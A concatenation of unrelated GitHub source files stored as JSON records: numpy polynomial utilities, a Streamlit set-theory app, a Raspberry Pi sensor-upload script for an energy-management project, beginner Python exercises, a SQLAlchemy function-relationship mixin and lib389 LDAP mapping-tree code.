np.ones_like(breakpoints),\n            atol=check_atol,\n            rtol=check_rtol,\n        ).nonzero()\n        indices = indices[0]\n        x = np.linspace(break_val - 1, break_val + 1)\n        for ind in indices:\n            plt.plot(x, a[ind] * x ** 2 + b[ind] * x + c[ind], label=str(ind))\n        plt.legend()\n        plt.show()\n\n    assert (\n        np.sum(\n            np.isclose(\n                breakpoints,\n                break_val * np.ones_like(breakpoints),\n                atol=check_atol,\n                rtol=check_rtol,\n            )\n        )\n        == 1\n    )\n\n    assert np.isclose(\n        eval_poly(np.array([a[break_ind], b[break_ind], c[break_ind]]), break_val),\n        0,\n        atol=1e-8,\n    ), (\n        eval_poly(np.array([a[break_ind], b[break_ind], c[break_ind]]), break_val),\n        np.array([a[break_ind], b[break_ind], c[break_ind]]),\n        break_val,\n    )\n    return (break_ind, break_val)\n\n\ndef lex_min(arr):\n    \"\"\"\n    Given arr a matrix, find the minimal row for the lexicographic order\n    \"\"\"\n    min_row = arr[0]\n    min_index = 0\n    for i, row in enumerate(arr):\n        j = 0\n        while min_row[j] == row[j] and j < len(min_row) - 1:\n            j += 1\n        if min_row[j] > row[j]:\n            min_row = row\n            min_index = i\n    return min_index, min_row\n\n\ndef is_lex_leq(arr, comp_row):\n    \"\"\"\n    Given arr a matrix and comp_row a vector, test whether each row of arr\n    is <= comp_row in lexicographic order\n    \"\"\"\n    n, deg = arr.shape\n    assert comp_row.shape == (deg,)\n\n    is_leq = np.ones(n, dtype=bool)\n    for i, row in enumerate(arr):\n        j = 0\n        while comp_row[j] == row[j] and j < deg - 1:\n            j += 1\n        assert comp_row[j] != row[j] or j == deg - 1\n        is_leq[i] = row[j] <= comp_row[j]\n\n    return is_leq\n\n\ndef invert_deg_one(arr, index=1):\n    \"\"\" Negate column `index` (the degree-one coefficient by default) of the matrix arr \"\"\"\n    new_arr = np.copy(arr)\n    new_arr[..., index] = -new_arr[..., index]\n    return new_arr","repo_name":"tobyj2/time-series-class-project","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
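# Editor's note: a hedged, self-contained illustration of the breakpoint
# search implemented by compute_break_points()/next_break_point() above:
# for each quadratic a_i z^2 + b_i z + c_i keep its smaller real root,
# discard roots <= z_u (or with non-positive discriminant), and take the
# argmin. The coefficients below are made up for illustration.
import numpy as np

a = np.array([1.0, 1.0, 0.0])
b = np.array([-4.0, -2.0, 2.0])
c = np.array([3.0, -3.0, -8.0])
z_u = 0.5

delta = b ** 2 - 4 * a * c
with np.errstate(invalid="ignore", divide="ignore"):
    sol = (-b - np.sqrt(delta)) / (2 * a)       # smaller root of each quadratic
deg_one = np.isclose(a, 0) & ~np.isclose(b, 0)
sol[deg_one] = -c[deg_one] / b[deg_one]         # linear case: single root
keep = (sol > z_u) & ~np.isnan(sol) & (delta > 0)
sol[~keep] = np.inf
print(sol, np.argmin(sol))  # -> [ 1. inf  4.] 0: the next breakpoint is z = 1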
+{"seq_id":"43320462762","text":"\nimport TCVar # set-theory variables (Teoria de Conjuntos)\nimport DS # string sanitizer\nimport OperadorS\nimport streamlit as st\n\n\ndef Info():\n    st.write(\n        \"\"\"\n        * Number of unions: {}\n        * Number of intersections: {}\n        * Number of differences: {}\n        * Number of symmetric differences: {}\n        * Pairs of parentheses: {}\n        * Number of operations: {}\n        \"\"\".format(\n            TCVar.N_Un, TCVar.N_I, TCVar.N_D, TCVar.N_DS,\n            TCVar.N_PP, TCVar.N_Total\n        )\n    )\n\n\ndef Inicio():\n    st.write(\n        \"\"\"\n        Operations between sets:\n        * Union -> un\n        * Intersection -> in\n        * Difference -> di\n        * Complement -> UdiA\n        * Symmetric difference -> ds\n\n        To perform several operations you must use parentheses.\n\n        Example:\n\n        * (AunB)diC\n        * Ain(CdsB)\n        * ((AunB)in(CinB))un(AdiB)\n        ## Sets:\n        ### U = {}\n        ### A = {}\n        ### B = {}\n        ### C = {}\n        \"\"\".format(TCVar.U, TCVar.A, TCVar.B, TCVar.C)\n    )\n\n\ndef VaciarVariables():\n    TCVar.N_Un = 0  # unions\n    TCVar.N_I = 0  # intersections\n    TCVar.N_D = 0  # differences\n    TCVar.N_DS = 0  # symmetric differences\n    TCVar.N_Total = 0  # total number of operations\n    TCVar.N_PP = 0  # number of parenthesis pairs\n\n\nst.title('Set Theory')\n\nInicio()\n\ntex_input = st.text_input('Enter the operation:')\n\nif len(tex_input) != 0:\n    # returns (bool, str)\n    verificadorS, op = DS.DepuradorString(tex_input)\n    if verificadorS:\n        if len(op) == 1:\n            st.write('Operation: ')\n            st.write(\n                \"\"\"\n                ## {} = {}\n                \"\"\".format(op, TCVar.SolicitarConjunto(op))\n            )\n            VaciarVariables()\n        else:\n            #S, V, Data = OperadorS.SeparadorOperaciones(op)\n            S, V = OperadorS.SeparadorOperaciones(op)\n            st.write(\n                \"\"\"\n                ### Operation:\n                ## {} = {}\n                \"\"\".format(S, V)\n            )\n            #st.markdown(Data.to_markdown())\n            VaciarVariables()\n            OperadorS.Data = None\n    else:\n        st.write(op)\n        VaciarVariables()\n        OperadorS.Data = None\nelse:\n    VaciarVariables()\n    OperadorS.Data = None\n","repo_name":"plao2411p/webapp_TC","sub_path":"app/TeoriaConjuntos.py","file_name":"TeoriaConjuntos.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"1024062155","text":"import argparse\nfrom glob import glob\nfrom PIL import Image\nimport pandas as pd\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('path', type=str)\n    args = parser.parse_args()\n\n    image_filenames = glob(f'{args.path}/*.png')\n\n    df = pd.DataFrame(columns=['image_filename'])\n    df['image_filename'] = image_filenames\n    df['id'] = df['image_filename'].apply(lambda x: str(x).split('/')[-1].split('_')[0])\n    df['organ'] = df['image_filename'].apply(lambda x: str(x).split('/')[-1].split('_')[1])\n    df['fold'] = df['image_filename'].apply(lambda x: int(str(x).split('/')[-1].split('_')[2].replace('fold', '')))\n    df['epoch'] = df['image_filename'].apply(lambda x: int(str(x).split('/')[-1].split('_')[3].replace('epoch', '')))\n\n    for image_id, df_image in df.groupby('id'):\n        df_image = df_image.sort_values(by='epoch', ascending=True).reset_index(drop=True)\n        frames = (Image.open(f) for f in df_image['image_filename'])\n        frame = next(frames)\n        frame.save(\n            fp=f'/home/gunes/Desktop/{image_id}.gif',\n            format='GIF',\n            append_images=frames,\n            save_all=True,\n            duration=30,\n            loop=0\n        )\n","repo_name":"gunesevitan/hubmap-hpa-hacking-the-human-body","sub_path":"src/utilities/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"}
+{"seq_id":"30861929599","text":"#!/usr/bin/env python3\r\nimport serial\r\nimport time\r\nfrom datetime import datetime\r\nimport http.client\r\nimport json\r\nimport sys\r\nimport requests\r\nimport Seeed_AMG8833\r\nimport os\r\nimport picamera\r\nimport base64\r\nimport subprocess\r\nfrom board import SCL, SDA\r\nimport busio\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport adafruit_ssd1306\r\n\r\narduino=serial.Serial('/dev/ttyUSB0', baudrate = 9600, timeout= 1)\r\ntime.sleep(3)\r\nbody=\"\"\r\nnumPoints = 1\r\ndataList = [0] * numPoints\r\nheaders = {'Accept-Charset': 'utf-8','Content-Type': 
'application/json'}\r\n\r\nURL = \"http://47.56.85.130:18888/uimg\"\r\nPARAMS = {'n': 'f348'}\r\n\r\nos.putenv('SDL_FBDEV', '/dev/fb1')\r\nsensor = Seeed_AMG8833.AMG8833()\r\n\r\nlogfile = open('updatedata.log', 'a')\r\ntimestamp = datetime.now()\r\nprint(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Sensing data start.\", file = logfile)\r\nlogfile.close()\r\ncamera = picamera.PiCamera()\r\n\r\ni2c = busio.I2C(SCL, SDA)\r\ndisp = adafruit_ssd1306.SSD1306_I2C(128, 64, i2c)\r\ndisp.fill(0)\r\ndisp.show()\r\nwidth = disp.width\r\nheight = disp.height\r\nimage = Image.new(\"1\", (width, height))\r\ndraw = ImageDraw.Draw(image)\r\ndraw.rectangle((0, 0, width, height), outline=0, fill=0)\r\npadding = -2\r\ntop = padding\r\nbottom = height - padding\r\nx = 0\r\nfont = ImageFont.truetype('/usr/share/fonts/truetype/Pixellari.ttf', 16)\r\n\r\n\r\n\r\ndef getValue():\r\n \r\n #read serial\r\n arduinoData = arduino.readline().decode(\"ascii\").split('\\r\\n')\r\n #print(arduinoData[0])\r\n return arduinoData[0]\r\n\r\ndef uploadData(thData):\r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n try:\r\n conn.request('POST','/api/SensorUpdateCurrentValue', thData, headers)\r\n res = conn.getresponse()\r\n thData = res.read()\r\n print(res.status, res.reason)\r\n print(thData.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n logfile = open('updatedata.log', 'a')\r\n timestamp = datetime.now()\r\n print(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Data upload successfully\", file = logfile)\r\n logfile.close()\r\n print(\"Data uploaded\")\r\n except:\r\n logfile = open('updatedata.log', 'a')\r\n timestamp = datetime.now()\r\n print(\"[\" + timestamp.strftime('%d-%b-%Y %H:%M:%S') + \"] Data failed to upload\", file = logfile)\r\n logfile.close()\r\n\r\ndef uploadIRThermalPhoto():\r\n pixels = sensor.read_temp()\r\n print(pixels)\r\n r=requests.post(url=URL, json=pixels, params=PARAMS)\r\n print(r)\r\n print(\"IR Cam Data uploaded\")\r\n\r\ndef uploadPiCameraPhoto():\r\n \r\n time.sleep(2) # Camera warm-up time\r\n camera.capture('piCamPic.jpg')\r\n \r\n with open(\"piCamPic.jpg\", \"rb\") as img_file:\r\n my_string = base64.b64encode(img_file.read())\r\n print(\"base64: \")\r\n print(my_string)\r\n \r\n \r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n camData = \"{\" + '\"' + \"deviceId\" + '\"' + \":\" + '\"CA1\"' + \", \" + '\"' + \"base_cam_img\" + '\"' + \":\" + '\"' + str(my_string) + '\"' + \", \" + '\"' + \"roomId\" + '\"' + \":\" + '\"' + \"F348\" + '\"' + \"}\"\r\n print(camData)\r\n \r\n try:\r\n conn.request('POST','/api/Picam', camData, headers)\r\n res = conn.getresponse()\r\n camthData = res.read()\r\n print(res.status, res.reason)\r\n print(camthData.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n print(\"Pi Cam Data uploaded\")\r\n except:\r\n print(\"failed!!!!!!!!\")\r\n \r\n \r\n \r\ndef getACData():\r\n conn = http.client.HTTPConnection('13.75.55.240')\r\n try:\r\n conn.request('GET','/api/getDeviceStatus/AC011', \"\", headers)\r\n res = conn.getresponse()\r\n thedata = res.read()\r\n print(\"devices: \",thedata,res.status, res.reason)\r\n print(thedata.decode('utf-8'))\r\n print()\r\n print(res.getheaders())\r\n return thedata\r\n except:\r\n print()\r\n \r\n \r\n \r\nwhile (1):\r\n \r\n data = getValue()\r\n print(data)\r\n time.sleep(1)\r\n uploadData(data)\r\n uploadIRThermalPhoto()\r\n #uploadPiCameraPhoto()\r\n \r\n jsonDevice = getACData()\r\n \r\n deviceData = json.loads(jsonDevice)\r\n getDeviceID = 
deviceData[\"deviceId\"]\r\n getDeviceStatus = deviceData[\"status\"]\r\n getDeviceSetValue = deviceData[\"set_value\"]\r\n #print(getDeviceID, \", \", getDeviceStatus, \", \", getDeviceSetValue)\r\n # Draw a black filled box to clear the image.\r\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\r\n \r\n ACID = getDeviceID #get from API\r\n TempNumber = getDeviceSetValue #get from API\r\n C = \"C\"\r\n Temp = str(TempNumber) + C\r\n if getDeviceStatus == \"True\":\r\n onOff = \"On\"\r\n else:\r\n onOff = \"Off\"\r\n \r\n dateTime = datetime.now()\r\n dataStr = \"Time: \" + dateTime.strftime(\"%H:%M\")\r\n \r\n draw.text((x, top + 12), \"AC: \" + ACID, font=font, fill=255)\r\n draw.text((x, top + 24), \"Temp: \" + Temp, font=font, fill=255)\r\n draw.text((x, top + 36), \"Status: \" + onOff, font=font, fill=255)\r\n draw.text((x, top + 48), dataStr, font=font, fill=255)\r\n\r\n # Display image.\r\n disp.image(image)\r\n disp.show()\r\n time.sleep(0.1)\r\n time.sleep(3)\r\n \r\n \r\n \r\n\r\ntime.sleep(3)\r\ntime.sleep(2)","repo_name":"wAikAp/Intelligent-Energy-Management-System-for-Buildings-INB","sub_path":"raspberryPi_source_code/FYP_py/uploadData.py","file_name":"uploadData.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"29932902959","text":"#convertidor centimtros a pulgadas\ncentimetros = int(input('ingrese longitud en centimetros : '))\npulgadas = 2.54\n\nresultado = centimetros / pulgadas\n\nprint(centimetros ,' cm = ', resultado)\n\n#Escriba un programa que pida al usuario un entero de tres dígitos, y entregue el número con los dígitos en orden inverso\n\nnumeros = (input('ingrese un entero de tres digitos: '))\nprint(numeros[:: -1])\n\n\n#escriba un programa que calcule la hipotenuza segun el teorma de pitagoras\n\na = int(input('ingrese cateto a:'))\nb = int(input('ingrese cateto b: '))\n\nhipotenusa = ((a**2 +b**2)**(1/2))\n\nprint(hipotenusa)\n\n\n##hora futura\nhora1 = int(input('Hora actual: '))\ncantidad = int(input('Cantidad horas: '))\n\nhora_futura = hora1 + cantidad\n\nprint('En ', cantidad, 'horas el reloj marcara las ',hora_futura)\n\n#numero decimal\nnumero_real = float(input('ingrese un numero: '))\nnumero_entero= int(numero_real)\ndecimal = numero_real-numero_entero\n\nprint(decimal)\n\n\n#numero par\nnumero = int(input('ingrese un nuemro:'))\nmultiplo = 4\nif numero % multiplo == 0:\n print('es par')\nelse:\n print('no es par')\n\n#año bisiesto\ndef bisiesto(x):\n if x% 4 ==0 or x%400==0:\n return 'es bisiesto'\n else:\n return 'no es bisiesto' \n \n\nx = int(input('introduzca un año:'))\nprint(x,bisiesto(x))\n\n#ordenar numeros\na = int(input('escribe un nuemro: '))\nb = int(input('escribe otro numero: '))\nc = int(input('escribe otro numero: '))\n\nf = min(a,b,c)\nj = (a+b+c)-a-c\ng = max(a,b,c)\nprint(f'los numero orenados son {f}, {g}, {j}')\n\n\n\n\n \n \n","repo_name":"deibiarcon/ejercicios","sub_path":"ejercicios.py","file_name":"ejercicios.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27811719682","text":"#!/usr/bin/env python3\n\nNAT = \"ip nat inside source list ACL interface FastEthernet0/1 overload\"\nMAC = 'AAAA:BBBB:CCCC'\nIP = '192.168.3.1'\nCONFIG = 'switchport trunk allowed vlan 1,3,10,20,30,100'\ncommand1 = 'switchport trunk allowed vlan 1,3,10,20,30,100'\ncommand2 = 'switchport trunk allowed vlan 1,3,100,200,300'\nVLANS = 
[10, 20, 30, 1, 2, 100, 10, 30, 3, 4, 10]\nVLANS_uniqe = list(set(VLANS))\nVLANS_uniqe.sort()\n\nVLANS_list = list(set([int(vlan) for vlan in command1.split()[-1].split(',')]) & set([int(vlan) for vlan in command2.split()[-1].split(',')]))\n\n\nospf_route = 'O 10.0.24.0/24 [110/41] via 10.0.13.3, 3d18h, FastEthernet0/0'\n\nospf_route_list = ospf_route.split()\n\nospf_template = '''\n Protocol: {:<}SPF\n Prefix: {:<}\n AD/Metric: {:<}\n Next-Hop: {:<}\n Last Update: {:<}\n Outbound Interface: {:<}\n '''\n\nip_template = '''\n IP address:\n {0:<8} {1:<8} {2:<8} {3:<8}\n {0:08b} {1:08b} {2:08b} {3:08b}\n '''\n\nip_list = IP.split('.')\n\nprint(NAT.replace('Fast','Gigabit'))\nprint(MAC.replace(':','.'))\nprint(CONFIG.split()[-1].split(','))\nprint(VLANS_uniqe)\nprint(VLANS_list)\nprint(ospf_template.format(ospf_route_list[0],ospf_route_list[1],ospf_route_list[2].strip('[]'),ospf_route_list[4].rstrip(','),ospf_route_list[5].rstrip(','),ospf_route_list[6]))\nprint('{:b}{:b}{:b}'.format(int(MAC.split(':')[0],16),int(MAC.split(':')[1],16),int(MAC.split(':')[2],16)))\nprint(ip_template.format(int(ip_list[0]),int(ip_list[1]),int(ip_list[2]),int(ip_list[3])))","repo_name":"kuzzzko/python","sub_path":"task_4_6.py","file_name":"task_4_6.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74828372567","text":"\"\"\"# Function relator mixin\"\"\"\n\nfrom .function_mixin import FunctionMixin\n\nfrom sqlalchemy import Column, Integer, PickleType\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy_mutable import MutableListType, MutableDictType\n\nclass FunctionRelator():\n \"\"\"\n Base for database models with relationships to Function models. It \n provides automatic conversion of functions to Function models when \n setting attributes.\n\n Examples\n --------\n In the setup, we create a SQLAlchemy session, define a Parent model \n subclassing `FunctionRelator`, and a Function model subclassing \n `FunctionMixin`.\n\n ```python\n from sqlalchemy_function import FunctionMixin, FunctionRelator\n\n # standard session creation\n from sqlalchemy import create_engine, Column, ForeignKey, Integer\n from sqlalchemy.orm import relationship, sessionmaker, scoped_session\n from sqlalchemy.ext.declarative import declarative_base\n\n engine = create_engine('sqlite:///:memory:')\n session_factory = sessionmaker(bind=engine)\n Session = scoped_session(session_factory)\n session = Session()\n Base = declarative_base()\n\n # subclass `FunctionRelator` for models with a relationship to Function models\n class Parent(FunctionRelator, Base):\n \\ __tablename__ = 'parent'\n \\ id = Column(Integer, primary_key=True)\n \\ functions = relationship('Function', backref='parent')\n\n # subclass `FunctionMixin` to define a Function model\n class Function(FunctionMixin, Base):\n \\ __tablename__ = 'function'\n \\ id = Column(Integer, primary_key=True)\n \\ parent_id = Column(Integer, ForeignKey('parent.id'))\n\n Base.metadata.create_all(engine)\n ```\n\n We can now set the `functions` attribute to a callable as follows.\n\n ```python\n def foo(*args, **kwargs):\n \\ print('My args are', args)\n \\ print('My kwargs are', kwargs)\n \\ return 'return value'\n \n parent = Parent()\n parent.functions = foo\n # equivalent to:\n # parent.functions = [foo]\n # parent.functions = Function(foo)\n # parent.functions = [Function(foo)]\n parent.functions\n ```\n\n Out:\n\n ```\n [<__main__.Function object at 0x7f4e5a49c160>]\n ```\n 
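

    A single callable is converted the same way for scalar relationships,
    and `None` entries are dropped during list conversion, so assigning
    `None` leaves an empty list. A hedged sketch, reusing the models
    defined above:

    ```python
    parent.functions = [foo, None]  # the None entry is filtered out
    len(parent.functions)
    ```

    Out:

    ```
    1
    ```
    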
\"\"\"\n\n # FunctionRelator overrides the __setattr__ method to check for Function \n # model relationships. These attributes need to be set through the super() \n # method, and are considered 'exempt'.\n _exempt_attrs_fr = ['_func_rel_indicator', '_func_rel_attrs']\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Set class function relationship indicators and attributes.\n\n Attributes\n ----------\n _func_rel_indicator : dict\n Maps attribute names to boolean indicator that the attribute \n subclasses `FunctionMixin`.\n\n _func_rel_attrs : dict\n Maps Function model attribute names to `(class, use_list)` tuple. \n `class` is the Function model class. `use_list` indicates that the \n Function model attribute is a list.\n \"\"\"\n if not hasattr(cls, '_func_rel_indicator'):\n cls._func_rel_indicator = {}\n cls._func_rel_attrs = {}\n try:\n return super().__new__(cls, *args, **kwargs)\n except:\n return super().__new__(cls)\n\n def __setattr__(self, name, value):\n \"\"\"Set attribute\n\n Before setting an attribute, determine if it the attribute is a \n relationship to a Function model. If so, convert the value from a \n function(s) to a Function model(s).\n \"\"\"\n if name in self._exempt_attrs_fr:\n return super().__setattr__(name, value)\n is_func_rel = self._func_rel_indicator.get(name)\n if is_func_rel is None:\n is_func_rel = self._set_func_rel(name)\n if is_func_rel:\n model_class, use_list = self._func_rel_attrs[name]\n if use_list:\n value = self._to_function_models(value, model_class)\n else:\n value = self._to_function_model(value, model_class)\n super().__setattr__(name, value)\n\n @classmethod\n def _set_func_rel(cls, name):\n \"\"\"\n Set the function relationship status for a previously unseen \n attribute.\n\n Parameters\n ----------\n name : str\n Name of the previously unseen attribute.\n\n Returns\n -------\n is_func_rel : bool\n Indicates that the named attribute is a relationship to a Function \n model.\n \"\"\"\n mapper = inspect(cls).mapper\n rel = [r for r in mapper.relationships if r.key == name]\n if not (rel and FunctionMixin in rel[0].mapper.class_.__mro__):\n is_func_rel = False\n else:\n rel = rel[0]\n cls._func_rel_attrs[name] = (rel.mapper.class_, rel.uselist)\n is_func_rel = True\n cls._func_rel_indicator[name] = is_func_rel\n return is_func_rel\n \n def _to_function_models(self, funcs, model_class):\n \"\"\"\n Convert a list of functions to Function models.\n \n Parameters\n ----------\n func : list of callables\n List of callables (functions) to convert\n\n model_class : class\n Class of the Function model to which the functions will be \n converted.\n \"\"\"\n if not isinstance(funcs, list):\n funcs = [funcs]\n models = [self._to_function_model(f, model_class) for f in funcs]\n return [m for m in models if m is not None]\n \n def _to_function_model(self, func, model_class):\n \"\"\"Convert a single function to a Function model.\"\"\"\n if isinstance(func, model_class):\n return func\n if callable(func):\n return model_class(func)\n if func is None:\n return None\n raise ValueError(\n 'Function relationships requre Function models or callables'\n )","repo_name":"dsbowen/sqlalchemy-function","sub_path":"sqlalchemy_function/function_relator.py","file_name":"function_relator.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13408273481","text":"import ldap\nfrom ldap.dn import str2dn, dn2str, is_dn\nfrom lib389._constants import *\nfrom 
lib389.properties import *\nfrom lib389.utils import suffixfilt, normalizeDN\nfrom lib389 import Entry\nfrom lib389.exceptions import NoSuchEntryError, InvalidArgumentError\n\n\nfrom lib389._mapped_object import DSLdapObjects, DSLdapObject\n\n\nclass MappingTreeLegacy(object):\n '''\n classdocs\n '''\n\n proxied_methods = 'search_s getEntry'.split()\n\n def __init__(self, conn):\n \"\"\"\n @param conn - a DirSrv instance\n \"\"\"\n self.conn = conn\n self.log = conn.log\n\n def __getattr__(self, name):\n if name in MappingTree.proxied_methods:\n from lib389 import DirSrv\n return DirSrv.__getattr__(self.conn, name)\n\n def list(self, suffix=None, bename=None):\n '''\n Returns a search result of the mapping tree entries with all their\n attributes\n\n If 'suffix'/'bename' are specified. It uses 'benamebase' first,\n then 'suffix'.\n\n If neither 'suffix' and 'bename' are specified, it returns all\n the mapping tree entries\n\n @param suffix - suffix of the backend\n @param benamebase - backend common name (e.g. 'userRoot')\n\n @return mapping tree entries\n\n @raise if search fails\n\n '''\n if bename:\n filt = \"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND], bename)\n elif suffix:\n filt = \"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX], suffix)\n else:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n ents = self.conn.search_s(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt)\n for ent in ents:\n self.log.debug('list: %r', ent)\n except:\n raise\n\n return ents\n\n def create(self, suffix=None, bename=None, parent=None):\n '''\n Create a mapping tree entry (under \"cn=mapping tree,cn=config\"),\n for the 'suffix' and that is stored in 'bename' backend.\n 'bename' backend must exist before creating the mapping tree entry.\n\n If a 'parent' is provided that means that we are creating a\n sub-suffix mapping tree.\n\n @param suffix - suffix mapped by this mapping tree entry. It will\n be the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 
'userRoot')\n @param parent - if provided is a parent suffix of 'suffix'\n\n @return DN of the mapping tree entry\n\n @raise ldap.NO_SUCH_OBJECT - if the backend entry or parent mapping\n tree does not exist\n ValueError - if missing a parameter,\n\n '''\n # Check suffix is provided\n if not suffix:\n raise ValueError(\"suffix is mandatory\")\n else:\n nsuffix = normalizeDN(suffix)\n\n # Check backend name is provided\n if not bename:\n raise ValueError(\"backend name is mandatory\")\n\n # Check that if the parent suffix is provided then\n # it exists a mapping tree for it\n if parent:\n nparent = normalizeDN(parent)\n filt = suffixfilt(parent)\n try:\n entry = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_SUBTREE,\n filt)\n pass\n except NoSuchEntryError:\n raise ValueError(\"parent suffix has no mapping tree\")\n else:\n nparent = \"\"\n\n # Check if suffix exists, return\n filt = suffixfilt(suffix)\n try:\n entry = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_SUBTREE,\n filt)\n return entry\n except ldap.NO_SUCH_OBJECT:\n entry = None\n\n #\n # Now start the real work\n #\n\n # fix me when we can actually used escaped DNs\n dn = ','.join(('cn=\"%s\"' % nsuffix, DN_MAPPING_TREE))\n entry = Entry(dn)\n entry.update({\n 'objectclass': ['top', 'extensibleObject', MT_OBJECTCLASS_VALUE],\n 'nsslapd-state': 'backend',\n # the value in the dn has to be DN escaped\n # internal code will add the quoted value - unquoted value is\n # useful for searching.\n MT_PROPNAME_TO_ATTRNAME[MT_SUFFIX]: nsuffix,\n MT_PROPNAME_TO_ATTRNAME[MT_BACKEND]: bename\n })\n\n # possibly add the parent\n if parent:\n entry.setValues(MT_PROPNAME_TO_ATTRNAME[MT_PARENT_SUFFIX], nparent)\n\n try:\n self.log.debug(\"Creating entry: %s\", entry.dn)\n self.log.info(\"Entry %r\", entry)\n self.conn.add_s(entry)\n except ldap.LDAPError as e:\n raise ldap.LDAPError(\"Error adding suffix entry \" + dn, e)\n\n ret = self.conn._test_entry(dn, ldap.SCOPE_BASE)\n return ret\n\n def delete(self, suffix=None, bename=None, name=None):\n '''\n Delete a mapping tree entry (under \"cn=mapping tree,cn=config\"),\n for the 'suffix' and that is stored in 'benamebase' backend.\n 'benamebase' backend is not changed by the mapping tree deletion.\n\n If 'name' is specified. It uses it to retrieve the mapping tree\n to delete. Else if 'suffix'/'benamebase' are specified. It uses\n both to retrieve the mapping tree to delete\n\n @param suffix - suffix mapped by this mapping tree entry. It is\n the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 
'userRoot')\n @param name - DN of the mapping tree entry\n\n @return None\n\n @raise ldap.NO_SUCH_OBJECT - the entry is not found\n KeyError if 'name', 'suffix' and\n 'benamebase' are missing\n UnwillingToPerformError - If the mapping tree has\n subordinates\n '''\n if name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n try:\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt)\n self.log.debug(\"delete: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n else:\n filt = None\n\n if suffix:\n filt = suffixfilt(suffix)\n\n if bename:\n if filt:\n filt = (\"(&(%s=%s)%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename,\n filt))\n else:\n filt = (\"(%s=%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND], bename))\n\n try:\n ent = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt)\n self.log.debug(\"delete: %s found by with %s\", ent.dn, filt)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n\n #\n # At this point 'ent' contains the mapping tree entry to delete\n #\n\n # First Check there is no child (replica, replica agreements)\n try:\n ents = self.conn.search_s(ent.dn, ldap.SCOPE_SUBTREE,\n \"objectclass=*\")\n except:\n raise\n if len(ents) != 1:\n for entry in ents:\n self.log.warning(\"Error: it exists %s under %s\",\n entry.dn, ent.dn)\n raise ldap.UNWILLING_TO_PERFORM(\n \"Unable to delete %s, it is not a leaf\" % ent.dn)\n else:\n for entry in ents:\n self.log.warning(\"Warning: %s (%s)\", entry.dn, ent.dn)\n self.conn.delete_s(ent.dn)\n\n def getProperties(self, suffix=None, bename=None, name=None,\n properties=None):\n '''\n Returns a dictionary of the requested properties.\n If properties is missing, it returns all the properties.\n\n The returned properties are those of the 'suffix' and that is\n stored in 'benamebase' backend.\n\n If 'name' is specified. It uses it to retrieve the mapping tree\n to delete Else if 'suffix'/'benamebase' are specified. It uses\n both to retrieve the mapping tree to\n\n If 'name', 'benamebase' and 'suffix' are missing it raise an\n exception\n\n @param suffix - suffix mapped by this mapping tree entry.\n It is the common name ('cn') of the entry\n @param benamebase - backend common name (e.g. 
'userRoot')\n @param name - DN of the mapping tree entry\n @param - properties - list of properties\n\n @return - returns a dictionary of the properties\n\n @raise ValueError - if some name of properties are not valid\n KeyError - if some name of properties are not valid\n ldap.NO_SUCH_OBJECT - if the mapping tree entry is not found\n '''\n\n if name:\n filt = \"(objectclass=%s)\" % MT_OBJECTCLASS_VALUE\n\n try:\n ent = self.conn.getEntry(name, ldap.SCOPE_BASE, filt,\n list(MT_PROPNAME_TO_ATTRNAME.values())\n )\n self.log.debug(\"delete: %s found by its DN\", ent.dn)\n except NoSuchEntryError:\n raise ldap.NO_SUCH_OBJECT(\"mapping tree DN not found: %s\" %\n name)\n else:\n filt = None\n\n if suffix:\n filt = suffixfilt(suffix)\n\n if bename:\n if filt:\n filt = (\"(&(%s=%s)%s)\" %\n (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename, filt))\n else:\n filt = (\"(%s=%s)\" % (MT_PROPNAME_TO_ATTRNAME[MT_BACKEND],\n bename))\n\n try:\n ent = self.conn.getEntry(DN_MAPPING_TREE, ldap.SCOPE_ONELEVEL,\n filt,\n list(MT_PROPNAME_TO_ATTRNAME.values())\n 